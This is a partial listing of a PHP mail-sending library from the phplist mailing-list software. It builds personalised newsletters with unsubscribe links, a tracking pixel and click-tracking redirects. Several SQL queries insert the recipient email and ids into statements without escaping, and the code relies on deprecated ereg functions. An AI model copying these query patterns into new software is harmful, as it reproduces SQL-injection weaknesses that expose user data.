PageRenderTime 31ms CodeModel.GetById 27ms RepoModel.GetById 0ms app.codeStats 0ms

/phplist/admin/sendemaillib.php

https://github.com/radicaldesigns/amp
PHP | 899 lines | 754 code | 54 blank | 91 comment | 156 complexity | 8b7e98fd5becde72fdc808d076223554 MD5 | raw file
Possible License(s): LGPL-2.1, GPL-2.0, BSD-3-Clause, LGPL-2.0, CC-BY-SA-3.0, AGPL-1.0 
    

  1. <?php
    2. 

  2. require_once dirname(__FILE__).'/accesscheck.php';
    3. 

  3. 

  4. # send an email library
    5. 

  5. 

  6. if (PHPMAILER && is_file(dirname(__FILE__).'/phpmailer/class.phpmailer.php')) {
    7. 

  7.   # phplistmailer, extended of the popular phpmail class
    8. 

  8.   # this is still very experimental
    9. 

  9.   include_once $GLOBALS["coderoot"] . "class.phplistmailer.php";
    10. 

  10. } else {
    11. 

  11.   if (USE_OUTLOOK_OPTIMIZED_HTML) {
    12. 

  12.     require_once dirname(__FILE__)."/class.html.mime.mail-outlookfix.inc";
    13. 

  13.   } else {
    14. 

  14.     require_once dirname(__FILE__)."/class.html.mime.mail.inc";
    15. 

  15.   }
    16. 

  16. }
    17. 

  17. 

  18. if (!function_exists("output")) {
    19. 

  19.   function output($text) {
    20. 

  20.    }
    21. 

  21. }
    22. 

  22. 

  23. function sendEmail ($messageid,$email,$hash,$htmlpref = 0,$rssitems = array(),$forwardedby = array()) {
    24. 

  24.   global $strThisLink,$PoweredByImage,$PoweredByText,$cached,$website;
    25. 

  25.   if ($email == "")
    26. 

  26.     return 0;
    27. 

  27.   if (!$cached[$messageid]) {
    28. 

  28.     $domain = getConfig("domain");
    29. 

  29.     $message = Sql_query("select * from {$GLOBALS["tables"]["message"]} where id = $messageid");
    30. 

  30.     $cached[$messageid] = array();
    31. 

  31.     $message = Sql_fetch_array($message);
    32. 

  32.     if (ereg("([^ ]+@[^ ]+)",$message["fromfield"],$regs)) {
    33. 

  33.       # if there is an email in the from, rewrite it as "name <email>"
    34. 

  34.       $message["fromfield"] = ereg_replace($regs[0],"",$message["fromfield"]);
    35. 

  35.       $cached[$messageid]["fromemail"] = $regs[0];
    36. 

  36.       # if the email has < and > take them out here
    37. 

  37.       $cached[$messageid]["fromemail"] = ereg_replace("<","",$cached[$messageid]["fromemail"]);
    38. 

  38.       $cached[$messageid]["fromemail"] = ereg_replace(">","",$cached[$messageid]["fromemail"]);
    39. 

  39.       # make sure there are no quotes around the name
    40. 

  40.       $cached[$messageid]["fromname"] = ereg_replace('"',"",ltrim(rtrim($message["fromfield"])));
    41. 

  41.     } elseif (ereg(" ",$message["fromfield"],$regs)) {
    42. 

  42.       # if there is a space, we need to add the email
    43. 

  43.       $cached[$messageid]["fromname"] = $message["fromfield"];
    44. 

  44.       $cached[$messageid]["fromemail"] = "listmaster@$domain";
    45. 

  45.     } else {
    46. 

  46.       $cached[$messageid]["fromemail"] = $message["fromfield"] . "@$domain";
    47. 

  47.       $cached[$messageid]["fromname"] = $message["fromfield"] . "@$domain";
    48. 

  48.     }
    49. 

  49.     # erase double spacing
    50. 

  50.     while (ereg("  ",$cached[$messageid]["fromname"]))
    51. 

  51.       $cached[$messageid]["fromname"] = eregi_replace("  "," ",$cached[$messageid]["fromname"]);
    52. 

  52.     $cached[$messageid]["fromname"] = eregi_replace("@","",$cached[$messageid]["fromname"]);
    53. 

  53.     $cached[$messageid]["fromname"] = trim($cached[$messageid]["fromname"]);
    54. 

  54.     $cached[$messageid]["to"] = $message["tofield"];
    55. 

  55.     $cached[$messageid]["subject"] = $message["subject"];
    56. 

  56.     $cached[$messageid]["replyto"] =$message["replyto"];
    57. 

  57.     $cached[$messageid]["content"] = $message["message"];
    58. 

  58.     $cached[$messageid]["textcontent"] = $message["textmessage"];
    59. 

  59.     $cached[$messageid]["footer"] = $message["footer"];
    60. 

  60.     $cached[$messageid]["htmlformatted"] = $message["htmlformatted"];
    61. 

  61.     $cached[$messageid]["sendformat"] = $message["sendformat"];
    62. 

  62.     if ($message["template"]) {
    63. 

  63.       $req = Sql_Fetch_Row_Query("select template from {$GLOBALS["tables"]["template"]} where id = {$message["template"]}");
    64. 

  64.       $cached[$messageid]["template"] = stripslashes($req[0]);
    65. 

  65.       $cached[$messageid]["templateid"] = $message["template"];
    66. 

  66.    #   dbg("TEMPLATE: ".$req[0]);
    67. 

  67.     } else {
    68. 

  68.       $cached[$messageid]["template"] = '';
    69. 

  69.       $cached[$messageid]["templateid"] = 0;
    70. 

  70.     }
    71. 

  71. 

  72.     ## @@ put this here, so it can become editable per email sent out at a later stage
    73. 

  73.     $cached[$messageid]["html_charset"] = getConfig("html_charset");
    74. 

  74.     ## @@ need to check on validity of charset
    75. 

  75.     if (!$cached[$messageid]["html_charset"])
    76. 

  76.       $cached[$messageid]["html_charset"] = 'iso-8859-1';
    77. 

  77.     $cached[$messageid]["text_charset"] = getConfig("text_charset");
    78. 

  78.     if (!$cached[$messageid]["text_charset"])
    79. 

  79.       $cached[$messageid]["text_charset"] = 'iso-8859-1';
    80. 

  80.   }# else
    81. 

  81.   #  dbg("Using cached {$cached[$messageid]["fromemail"]}");
    82. 

  82.   if (VERBOSE)
    83. 

  83.     output($GLOBALS['I18N']->get('sendingmessage').' '.$messageid.' '.$GLOBALS['I18N']->get('withsubject').' '.
    84. 

  84.       $cached[$messageid]["subject"].' '.$GLOBALS['I18N']->get('to').' '.$email);
    85. 

  85. 

  86.   # erase any placeholders that were not found
    87. 

  87. #  $msg = ereg_replace("\[[A-Z ]+\]","",$msg);
    88. 

  88.   $user_att_values = getUserAttributeValues($email);
    89. 

  89.   $userdata = Sql_Fetch_Array_Query(sprintf('select * from %s where email = "%s"',
    90. 

  90.     $GLOBALS["tables"]["user"],$email));
    91. 

  91. 

  92.   $url = getConfig("unsubscribeurl");$sep = ereg('\?',$url)?'&':'?';
    93. 

  93.   $html["unsubscribe"] = sprintf('<a href="%s%suid=%s">%s</a>',$url,$sep,$hash,$strThisLink);
    94. 

  94.   $text["unsubscribe"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    95. 

  95.   $html["unsubscribeurl"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    96. 

  96.   $text["unsubscribeurl"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    97. 

  97.   $url = getConfig("subscribeurl");$sep = ereg('\?',$url)?'&':'?';
    98. 

  98.   $html["subscribe"] = sprintf('<a href="%s">%s</a>',$url,$strThisLink);
    99. 

  99.   $text["subscribe"] = sprintf('%s',$url);
    100. 

  100.   $html["subscribeurl"] = sprintf('%s',$url);
    101. 

  101.   $text["subscribeurl"] = sprintf('%s',$url);
    102. 

  102.   #?mid=1&id=1&uid=a9f35f130593a3d6b89cfe5cfb32a0d8&p=forward&email=michiel%40tincan.co.uk&
    103. 

  103.   $url = getConfig("forwardurl");$sep = ereg('\?',$url)?'&':'?';
    104. 

  104.   $html["forward"] = sprintf('<a href="%s%suid=%s&mid=%d">%s</a>',$url,$sep,$hash,$messageid,$strThisLink);
    105. 

  105.   $text["forward"] = sprintf('%s%suid=%s&mid=%d',$url,$sep,$hash,$messageid);
    106. 

  106.   $html["forwardurl"] = $text["forward"];
    107. 

  107.   $text["forwardurl"] = $text["forward"];
    108. 

  108.   $url = getConfig("public_baseurl");
    109. 

  109.   # make sure there are no newlines, otherwise they get turned into <br/>s
    110. 

  110.   $html["forwardform"] = sprintf('<form method="get" action="%s" name="forwardform" class="forwardform"><input type=hidden name="uid" value="%s" /><input type=hidden name="mid" value="%d" /><input type=hidden name="p" value="forward" /><input type=text name="email" value="" class="forwardinput" /><input name="Send" type="submit" value="%s" class="forwardsubmit"/></form>',$url,$hash,$messageid,$GLOBALS['strForward']);
    111. 

  111.   $text["signature"] = "\n\n--\nPowered by PHPlist, www.phplist.com --\n\n";
    112. 

  112.   $url = getConfig("preferencesurl");$sep = ereg('\?',$url)?'&':'?';
    113. 

  113.   $html["preferences"] = sprintf('<a href="%s%suid=%s">%s</a>',$url,$sep,$hash,$strThisLink);
    114. 

  114.   $text["preferences"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    115. 

  115.   $html["preferencesurl"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    116. 

  116.   $text["preferencesurl"] = sprintf('%s%suid=%s',$url,$sep,$hash);
    117. 

  117. /*
    118. 

  118.   We request you retain the signature below in your emails including the links.
    119. 

  119.   This not only gives respect to the large amount of time given freely
    120. 

  120.   by the developers  but also helps build interest, traffic and use of
    121. 

  121.   PHPlist, which is beneficial to it's future development.
    122. 

    123. 

  123.   You can configure how the credits are added to your pages and emails in your
    124. 

  124.   config file.
    125. 

    126. 

  126.   Michiel Dethmers, Tincan Ltd 2003, 2004
    127. 

  127. */
    128. 

  128.   if (!EMAILTEXTCREDITS) {
    129. 

  129.     $html["signature"] = $PoweredByImage;#'<div align="center" id="signature"><a href="http://www.phplist.com"><img src="powerphplist.png" width=88 height=31 title="Powered by PHPlist" alt="Powered by PHPlist" border="0"></a></div>';
    130. 

  130.     # oops, accidentally became spyware, never intended that, so take it out again :-)
    131. 

  131.     $html["signature"] = preg_replace('/src=".*power-phplist.png"/','src="powerphplist.png"',$html["signature"]);
    132. 

  132.   } else {
    133. 

  133.     $html["signature"] = $PoweredByText;
    134. 

  134.   }
    135. 

  135. 

  136.   $content = $cached[$messageid]["content"];
    137. 

  137.   if (preg_match("/##LISTOWNER=(.*)/",$content,$regs)) {
    138. 

  138.     $listowner = $regs[1];
    139. 

  139.     $content = ereg_replace($regs[0],"",$content);
    140. 

  140.   } else {
    141. 

  141.     $listowner = 0;
    142. 

  142.   }
    143. 

  143. 

  144.   if ($GLOBALS["has_pear_http_request"] && preg_match("/\[URL:([^\s]+)\]/i",$content,$regs)) {
    145. 

  145.     while (strlen($regs[1])) {
    146. 

  146.       $url = $regs[1];
    147. 

  147.       if (!preg_match('/^http/i',$url)) {
    148. 

  148.         $url = 'http://'.$url;
    149. 

  149.       }
    150. 

  150.       $remote_content = fetchUrl($url,$userdata);
    151. 

  151.       if ($remote_content) {
    152. 

  152.         $content = eregi_replace(preg_quote($regs[0]),$remote_content,$content);
    153. 

  153.         $cached[$messageid]["htmlformatted"] = strip_tags($content) != $content;
    154. 

  154.       } else {
    155. 

  155.         logEvent("Error fetching URL: $regs[1] to send to $email");
    156. 

  156.         return 0;
    157. 

  157.       }
    158. 

  158.       preg_match("/\[URL:([^\s]+)\]/i",$content,$regs);
    159. 

  159.     }
    160. 

  160.   }
    161. 

  161. 

  162.   if ($cached[$messageid]["htmlformatted"]) {
    163. 

  163.     if (!$cached[$messageid]["textcontent"]) {
    164. 

  164.       $textcontent = stripHTML($content);
    165. 

  165.     } else {
    166. 

  166.       $textcontent = $cached[$messageid]["textcontent"];
    167. 

  167.     }
    168. 

  168.     $htmlcontent = $content;
    169. 

  169.   } else {
    170. 

  170. #    $textcontent = $content;
    171. 

  171.     if (!$cached[$messageid]["textcontent"]) {
    172. 

  172.       $textcontent = $content;
    173. 

  173.     } else {
    174. 

  174.       $textcontent = $cached[$messageid]["textcontent"];
    175. 

  175.     }
    176. 

  176.     $htmlcontent = parseText($content);
    177. 

  177.   }
    178. 

  178.   $defaultstyle = getConfig("html_email_style");
    179. 

  179.   $adddefaultstyle = 0;
    180. 

  180. 

  181.   if ($cached[$messageid]["template"])
    182. 

  182.     # template used
    183. 

  183.     $htmlmessage = eregi_replace("\[CONTENT\]",$htmlcontent,$cached[$messageid]["template"]);
    184. 

  184.   else {
    185. 

  185.     # no template used
    186. 

  186.     $htmlmessage = $htmlcontent;
    187. 

  187.     $adddefaultstyle = 1;
    188. 

  188.   }
    189. 

  189.   $textmessage = $textcontent;
    190. 

  190. 

  191.   foreach (array("forwardform","forward","subscribe","preferences","unsubscribe","signature") as $item) {
    192. 

  192.     if (eregi('\['.$item.'\]',$htmlmessage,$regs)) {
    193. 

  193.       $htmlmessage = eregi_replace('\['.$item.'\]',$html[$item],$htmlmessage);
    194. 

  194.       unset($html[$item]);
    195. 

  195.     }
    196. 

  196.     if (eregi('\['.$item.'\]',$textmessage,$regs)) {
    197. 

  197.       $textmessage = eregi_replace('\['.$item.'\]',$text[$item],$textmessage);
    198. 

  198.       unset($text[$item]);
    199. 

  199.     }
    200. 

  200.   }
    201. 

  201.   foreach (array("forwardurl","subscribeurl","preferencesurl","unsubscribeurl") as $item) {
    202. 

  202.     if (eregi('\['.$item.'\]',$htmlmessage,$regs)) {
    203. 

  203.       $htmlmessage = eregi_replace('\['.$item.'\]',$html[$item],$htmlmessage);
    204. 

  204.     }
    205. 

  205.     if (eregi('\['.$item.'\]',$textmessage,$regs)) {
    206. 

  206.       $textmessage = eregi_replace('\['.$item.'\]',$text[$item],$textmessage);
    207. 

  207.     }
    208. 

  208.   }
    209. 

  209.   if ($hash != 'forwarded') {
    210. 

  210.     $text['footer'] = $cached[$messageid]["footer"];
    211. 

  211.     $html['footer'] = $cached[$messageid]["footer"];
    212. 

  212.   } else {
    213. 

  213.     $text['footer'] = getConfig('forwardfooter');
    214. 

  214.     $html['footer'] = $text['footer'];
    215. 

  215.   }
    216. 

  216. 

  217.   $text["footer"] = eregi_replace("\[UNSUBSCRIBE\]",$text["unsubscribe"],$text['footer']);
    218. 

  218.   $html["footer"] = eregi_replace("\[UNSUBSCRIBE\]",$html["unsubscribe"],$html['footer']);
    219. 

  219.   $text["footer"] = eregi_replace("\[SUBSCRIBE\]",$text["subscribe"],$text['footer']);
    220. 

  220.   $html["footer"] = eregi_replace("\[SUBSCRIBE\]",$html["subscribe"],$html['footer']);
    221. 

  221.   $text["footer"] = eregi_replace("\[PREFERENCES\]",$text["preferences"],$text["footer"]);
    222. 

  222.   $html["footer"] = eregi_replace("\[PREFERENCES\]",$html["preferences"],$html["footer"]);
    223. 

  223.   $text["footer"] = eregi_replace("\[FORWARD\]",$text["forward"],$text["footer"]);
    224. 

  224.   $html["footer"] = eregi_replace("\[FORWARD\]",$html["forward"],$html["footer"]);
    225. 

  225.   $html["footer"] = eregi_replace("\[FORWARDFORM\]",$html["forwardform"],$html["footer"]);
    226. 

  226.   if (sizeof($forwardedby) && isset($forwardedby['email'])) {
    227. 

  227.     $html["footer"] = eregi_replace("\[FORWARDEDBY]",$forwardedby["email"],$html["footer"]);
    228. 

  228.     $text["footer"] = eregi_replace("\[FORWARDEDBY]",$forwardedby["email"],$text["footer"]);
    229. 

  229.   }
    230. 

  230. 

  231.   $html["footer"] = '<div class="emailfooter">'.nl2br($html["footer"]).'</div>';
    232. 

  232. 

  233.   if (eregi("\[FOOTER\]",$htmlmessage))
    234. 

  234.     $htmlmessage = eregi_replace("\[FOOTER\]",$html["footer"],$htmlmessage);
    235. 

  235.   elseif ($html["footer"])
    236. 

  236.     $htmlmessage = addHTMLFooter($htmlmessage,'<br /><br />'.$html["footer"]);
    237. 

  237.   if (eregi("\[SIGNATURE\]",$htmlmessage))
    238. 

  238.     $htmlmessage = eregi_replace("\[SIGNATURE\]",$html["signature"],$htmlmessage);
    239. 

  239.   elseif ($html["signature"])
    240. 

  240.     $htmlmessage .= '<br />'.$html["signature"];
    241. 

  241.   if (eregi("\[FOOTER\]",$textmessage))
    242. 

  242.     $textmessage = eregi_replace("\[FOOTER\]",$text["footer"],$textmessage);
    243. 

  243.   else
    244. 

  244.     $textmessage .= "\n\n".$text["footer"];
    245. 

  245.   if (eregi("\[SIGNATURE\]",$textmessage))
    246. 

  246.     $textmessage = eregi_replace("\[SIGNATURE\]",$text["signature"],$textmessage);
    247. 

  247.   else
    248. 

  248.     $textmessage .= "\n".$text["signature"];
    249. 

  249. 

  250. #  $req = Sql_Query(sprintf('select filename,data from %s where template = %d',
    251. 

  251. #    $GLOBALS["tables"]["templateimage"],$cached[$messageid]["templateid"]));
    252. 

  252. 

  253.   $htmlmessage = eregi_replace("\[USERID\]",$hash,$htmlmessage);
    254. 

  254.   $htmlmessage = preg_replace("/\[USERTRACK\]/i",'<img src="http://'.$website.$GLOBALS["pageroot"].'/ut.php?u='.$hash.'&m='.$messageid.'" width="1" height="1" border="0">',$htmlmessage,1);
    255. 

  255.   $htmlmessage = eregi_replace("\[USERTRACK\]",'',$htmlmessage);
    256. 

  256. 

  257.   if ($listowner) {
    258. 

  258.     $att_req = Sql_Query("select name,value from {$GLOBALS["tables"]["adminattribute"]},{$GLOBALS["tables"]["admin_attribute"]} where {$GLOBALS["tables"]["adminattribute"]}.id = {$GLOBALS["tables"]["admin_attribute"]}.adminattributeid and {$GLOBALS["tables"]["admin_attribute"]}.adminid = $listowner");
    259. 

  259.     while ($att = Sql_Fetch_Array($att_req))
    260. 

  260.       $htmlmessage = preg_replace("#\[LISTOWNER.".strtoupper(preg_quote($att["name"]))."\]#",$att["value"],$htmlmessage);
    261. 

  261.   }
    262. 

  262. 

  263.   if (is_array($GLOBALS["default_config"])) {
    264. 

  264.     foreach($GLOBALS["default_config"] as $key => $val) {
    265. 

  265.       if (is_array($val)) {
    266. 

  266.         $htmlmessage = eregi_replace("\[$key\]",getConfig($key),$htmlmessage);
    267. 

  267.         $textmessage = eregi_replace("\[$key\]",getConfig($key),$textmessage);
    268. 

  268.       }
    269. 

  269.     }
    270. 

  270.   }
    271. 

  271. 

  272.   if (ENABLE_RSS && sizeof($rssitems)) {
    273. 

  273.     $rssentries = array();
    274. 

  274.     $request = join(",",$rssitems);
    275. 

  275.     $texttemplate = getConfig("rsstexttemplate");
    276. 

  276.     $htmltemplate = getConfig("rsshtmltemplate");
    277. 

  277.     $textseparatortemplate = getConfig("rsstextseparatortemplate");
    278. 

  278.     $htmlseparatortemplate = getConfig("rsshtmlseparatortemplate");
    279. 

  279.     $req = Sql_Query("select * from {$GLOBALS["tables"]["rssitem"]} where id in ($request) order by list,added");
    280. 

  280.     $curlist = "";
    281. 

  281.     while ($row = Sql_Fetch_array($req)) {
    282. 

  282.       if ($curlist != $row["list"]) {
    283. 

  283.         $row["listname"] = ListName($row["list"]);
    284. 

  284.         $curlist = $row["list"];
    285. 

  285.         $rssentries["text"] .= parseRSSTemplate($textseparatortemplate,$row);
    286. 

  286.         $rssentries["html"] .= parseRSSTemplate($htmlseparatortemplate,$row);
    287. 

  287.       }
    288. 

  288. 

  289.       $data_req = Sql_Query("select * from {$GLOBALS["tables"]["rssitem_data"]} where itemid = {$row["id"]}");
    290. 

  290.       while ($data = Sql_Fetch_Array($data_req))
    291. 

  291.         $row[$data["tag"]] = $data["data"];
    292. 

  292. 

  293.       $rssentries["text"] .= stripHTML(parseRSSTemplate($texttemplate,$row));
    294. 

  294.       $rssentries["html"] .= parseRSSTemplate($htmltemplate,$row);
    295. 

  295.     }
    296. 

  296.     $htmlmessage = eregi_replace("\[RSS\]",$rssentries["html"],$htmlmessage);
    297. 

  297.     $textmessage = eregi_replace("\[RSS\]",$rssentries["text"],$textmessage);
    298. 

  298.   }
    299. 

  299. 

  300.   if (is_array($userdata)) {
    301. 

  301.     foreach ($userdata as $name => $value) {
    302. 

  302.       if (eregi("\[".$name."\]",$htmlmessage,$regs)) {
    303. 

  303.         $htmlmessage = eregi_replace("\[".$name."\]",$value,$htmlmessage);
    304. 

  304.       }      if (eregi("\[".$name."\]",$textmessage,$regs)) {
    305. 

  305.         $textmessage = eregi_replace("\[".$name."\]",$value,$textmessage);
    306. 

  306.       }
    307. 

  307.     }
    308. 

  308.   }
    309. 

  309. 

  310.   $destinationemail = '';
    311. 

  311.   if (is_array($user_att_values)) {
    312. 

  312.     foreach ($user_att_values as $att_name => $att_value) {
    313. 

  313.       if (eregi("\[".$att_name."\]",$htmlmessage,$regs)) {
    314. 

  314.         $htmlmessage = eregi_replace("\[".$att_name."\]",$att_value,$htmlmessage);
    315. 

  315.       }
    316. 

  316.       if (eregi("\[".$att_name."\]",$textmessage,$regs)) {
    317. 

  317.         $textmessage = eregi_replace("\[".$att_name."\]",$att_value,$textmessage);
    318. 

  318.       }
    319. 

  319.       # @@@ undocumented, use alternate field for real email to send to
    320. 

  320.       if (isset($GLOBALS["alternate_email"]) && strtolower($att_name) == strtolower($GLOBALS["alternate_email"])) {
    321. 

  321.         $destinationemail = $att_value;
    322. 

  322.       }
    323. 

  323.     }
    324. 

  324.   }
    325. 

  325.   if (!$destinationemail) {
    326. 

  326.     $destinationemail = $email;
    327. 

  327.   }
    328. 

  328.   if (!ereg('@',$destinationemail) && isset($GLOBALS["expand_unqualifiedemail"])) {
    329. 

  329.     $destinationemail .= $GLOBALS["expand_unqualifiedemail"];
    330. 

  330.   }
    331. 

  331. 

  332.   if (eregi("\[LISTS\]",$htmlmessage)) {
    333. 

  333.     $lists = "";$listsarr = array();
    334. 

  334.     $req = Sql_Query(sprintf('select list.name from %s as list,%s as listuser where list.id = listuser.listid and listuser.userid = %d',$GLOBALS["tables"]["list"],$GLOBALS["tables"]["listuser"],$user_system_values["id"]));
    335. 

  335.     while ($row = Sql_Fetch_Row($req)) {
    336. 

  336.       array_push($listsarr,$row[0]);
    337. 

  337.     }
    338. 

  338.     $lists_html = join('<br/>',$listsarr);
    339. 

  339.     $lists_text = join("\n",$listsarr);
    340. 

  340.     $htmlmessage = ereg_replace("\[LISTS\]",$lists_html,$htmlmessage);
    341. 

  341.     $textmessage = ereg_replace("\[LISTS\]",$lists_text,$textmessage);
    342. 

  342.   }
    343. 

  343. 

  344.   ## click tracking
    345. 

  345.   # for now we won't click track forwards, as they are not necessarily users, so everything would fail
    346. 

    347. 

  347.   if (CLICKTRACK && $hash != 'forwarded') {
    348. 

  348. 

  349.     # let's leave this for now
    350. 

  350.     /*
    351. 

  351.     if (preg_match('/<base href="(.*)"([^>]*)>/Umis',$htmlmessage,$regs)) {
    352. 

  352.       $urlbase = $regs[1];
    353. 

  353.     } else {
    354. 

  354.       $urlbase = '';
    355. 

  355.     }
    356. 

  356. #    print "URLBASE: $urlbase<br/>";
    357. 

  357.     */
    358. 

  358. 

  359.     # convert html message
    360. 

  360. #    preg_match_all('/<a href="?([^> "]*)"?([^>]*)>(.*)<\/a>/Umis',$htmlmessage,$links);
    361. 

  361.     preg_match_all('/<a(.*)href="(.*)"([^>]*)>(.*)<\/a>/Umis',$htmlmessage,$links);
    362. 

  362. 

  363.     # to process the Yahoo webpage with base href and link like <a href=link> we'd need this one
    364. 

  364. #    preg_match_all('/<a href=([^> ]*)([^>]*)>(.*)<\/a>/Umis',$htmlmessage,$links);
    365. 

  365.     $clicktrack_root = sprintf('http://%s/lt.php',$website.$GLOBALS["pageroot"]);
    366. 

  366.     $phplist_root = sprintf('http://%s',$website.$GLOBALS["pageroot"]);
    367. 

  367.     for($i=0; $i<count($links[2]); $i++){
    368. 

  368.       $link = cleanUrl($links[2][$i]);
    369. 

  369.       $link = str_replace('"','',$link);
    370. 

  370.       $linkid = 0;
    371. 

  371. #      print "LINK: $link<br/>";
    372. 

  372.       if ((preg_match('/^http|ftp/',$link) || preg_match('/^http|ftp/',$urlbase)) && $link != 'http://www.phplist.com' && !strpos($link,$clicktrack_root)) {
    373. 

  373.         # take off personal uids
    374. 

  374.         $url = cleanUrl($link,array('PHPSESSID','uid'));
    375. 

  375. 

  376. #        $url = preg_replace('/&uid=[^\s&]+/','',$link);
    377. 

  377. 

  378. #        if (!strpos('http:',$link)) {
    379. 

  379. #          $link = $urlbase . $link;
    380. 

  380. #        }
    381. 

  381. 

  382.         $req = Sql_Query(sprintf('insert ignore into %s (messageid,userid,url,forward)
    383. 

  383.           values(%d,%d,"%s","%s")',$GLOBALS['tables']['linktrack'],$messageid,$userdata['id'],$url,addslashes($link)));
    384. 

  384.         $req = Sql_Fetch_Row_Query(sprintf('select linkid from %s where messageid = %s and userid = %d and forward = "%s"
    385. 

  385.         ',$GLOBALS['tables']['linktrack'],$messageid,$userdata['id'],$link));
    386. 

  386.         $linkid = $req[0];
    387. 

  387. 

  388.         $masked = "H|$linkid|$messageid|".$userdata['id'] ^ XORmask;
    389. 

  389.         $masked = urlencode(base64_encode($masked));
    390. 

  390.         $newlink = sprintf('<a%shref="http://%s/lt.php?id=%s" %s>%s</a>',$links[1][$i],$website.$GLOBALS["pageroot"],$masked,$links[3][$i],$links[4][$i]);
    391. 

  391.         $htmlmessage = str_replace($links[0][$i], $newlink, $htmlmessage);
    392. 

  392.       }
    393. 

  393.     }
    394. 

  394. 

  395.     # convert Text message
    396. 

  396.     preg_match_all('#(http://[^\s\>\}]+)#mis',$textmessage,$links);
    397. 

  397.     for($i=0; $i<count($links[1]); $i++){
    398. 

  398. #      $fullmatch = $links[0][$i];
    399. 

  399.       $link = cleanUrl($links[1][$i]);
    400. 

  400.       $linkid = 0;
    401. 

  401.       if (preg_match('/^http|ftp/',$link) && $link != 'http://www.phplist.com' && !strpos($link,$clicktrack_root)
    402. 

  402.       && $link != $phplist_root && $link != $phplist_root.'/'
    403. 

  403.       ) {
    404. 

  404.  #       $url = preg_replace('/&uid=[^\s&]+/','',$link);
    405. 

  405.         $url = cleanUrl($link,array('PHPSESSID','uid'));
    406. 

  406. 

  407.         $req = Sql_Query(sprintf('insert ignore into %s (messageid,userid,url,forward)
    408. 

  408.           values(%d,%d,"%s","%s")',$GLOBALS['tables']['linktrack'],$messageid,$userdata['id'],$url,$link));
    409. 

  409.         $req = Sql_Fetch_Row_Query(sprintf('select linkid from %s where messageid = %s and userid = %d and forward = "%s"
    410. 

  410.         ',$GLOBALS['tables']['linktrack'],$messageid,$userdata['id'],$link));
    411. 

  411.         $linkid = $req[0];
    412. 

  412. 

  413.         $masked = "T|$linkid|$messageid|".$userdata['id'] ^ XORmask;
    414. 

  414.         $masked = urlencode(base64_encode($masked));
    415. 

  415.         $newlink = sprintf('http://%s/lt.php?id=%s',$website.$GLOBALS["pageroot"],$masked);
    416. 

  416.         $textmessage = str_replace($links[0][$i], $newlink, $textmessage);
    417. 

  417.       }
    418. 

  418.     }
    419. 

  419.   }
    420. 

  420. 

  421.   #
    422. 

  422.   if (eregi("\[LISTS\]",$htmlmessage)) {
    423. 

  423.     $lists = "";$listsarr = array();
    424. 

  424.     $req = Sql_Query(sprintf('select list.name from %s as list,%s as listuser where list.id = listuser.listid and listuser.userid = %d',$tables["list"],$tables["listuser"],$user_system_values["id"]));
    425. 

  425.     while ($row = Sql_Fetch_Row($req)) {
    426. 

  426.       array_push($listsarr,$row[0]);
    427. 

  427.     }
    428. 

  428.     $lists_html = join('<br/>',$listsarr);
    429. 

  429.     $lists_text = join("\n",$listsarr);
    430. 

  430.     $htmlmessage = ereg_replace("\[LISTS\]",$lists_html,$htmlmessage);
    431. 

  431.     $textmessage = ereg_replace("\[LISTS\]",$lists_text,$textmessage);
    432. 

  432.   }
    433. 

  433. 

  434.   # remove any existing placeholders
    435. 

  435.   $htmlmessage = eregi_replace("\[[A-Z\. ]+\]","",$htmlmessage);
    436. 

  436.   $textmessage = eregi_replace("\[[A-Z\. ]+\]","",$textmessage);
    437. 

  437. 

  438.   # check that the HTML message as proper <head> </head> and <body> </body> tags
    439. 

  439.   # some readers fail when it doesn't
    440. 

  440.   if (!preg_match("#<body.*</body>#ims",$htmlmessage)) {
    441. 

  441.     $htmlmessage = '<body>'.$htmlmessage.'</body>';
    442. 

  442.   }
    443. 

  443.   if (!preg_match("#<head>.*</head>#ims",$htmlmessage)) {
    444. 

  444.     if (!$adddefaultstyle) {
    445. 

  445.      $defaultstyle = "";
    446. 

  446.     }
    447. 

  447.     $htmlmessage = '<head>
    448. 

  448.         <meta content="text/html;charset='.$cached[$messageid]["html_charset"].'" http-equiv="Content-Type">
    449. 

  449.         <title></title>'.$defaultstyle.'</head>'.$htmlmessage;
    450. 

  450.   }
    451. 

  451.   if (!preg_match("#<html>.*</html>#ims",$htmlmessage)) {
    452. 

  452.     $htmlmessage = '<html>'.$htmlmessage.'</html>';
    453. 

  453.   }
    454. 

  454. 

  455.   # particularly Outlook seems to have trouble if it is not \r\n
    456. 

  456.   # reports have come that instead this creates lots of trouble
    457. 

  457.   # this is now done in the global sendMail function, so it is not
    458. 

  458.   # necessary here
    459. 

  459. #  if (USE_CARRIAGE_RETURNS) {
    460. 

  460. #    $htmlmessage = preg_replace("/\r?\n/", "\r\n", $htmlmessage);
    461. 

  461. #    $textmessage = preg_replace("/\r?\n/", "\r\n", $textmessage);
    462. 

  462. #  }
    463. 

  463. 

  464.   # build the email
    465. 

  465.   if (!PHPMAILER) {
    466. 

  466.     $mail = new html_mime_mail(
    467. 

  467.       array('X-Mailer: PHPlist v'.VERSION,
    468. 

  468.             "X-MessageId: $messageid",
    469. 

  469.             "X-ListMember: $email",
    470. 

  470.             "Precedence: bulk",
    471. 

  471.             "List-Help: <".$text["preferences"].">",
    472. 

  472.             "List-Unsubscribe: <".$text["unsubscribe"].">",
    473. 

  473.             "List-Subscribe: <".getConfig("subscribeurl").">",
    474. 

  474.             "List-Owner: <mailto:".getConfig("admin_address").">"
    475. 

  475.     ));
    476. 

  476.   } else {
    477. 

  477.     $mail = new PHPlistMailer($messageid,$destinationemail);
    478. 

  478.     ##$mail->IsSMTP();
    479. 

  479.   }
    480. 

  480. 

  481.   list($dummy,$domaincheck) = split('@',$destinationemail);
    482. 

  482.   $text_domains = explode("\n",trim(getConfig("alwayssendtextto")));
    483. 

  483.   if (in_array($domaincheck,$text_domains)) {
    484. 

  484.     $htmlpref = 0;
    485. 

  485.     if (VERBOSE)
    486. 

  486.       output($GLOBALS['I18N']->get('sendingtextonlyto')." $domaincheck");
    487. 

  487.   }
    488. 

  488. 

  489.   list($dummy,$domaincheck) = split('@',$email);
    490. 

  490.   $text_domains = explode("\n",trim(getConfig("alwayssendtextto")));
    491. 

  491.   if (in_array($domaincheck,$text_domains)) {
    492. 

  492.     $htmlpref = 0;
    493. 

  493.     if (VERBOSE)
    494. 

  494.       output("Sending text only to $domaincheck");
    495. 

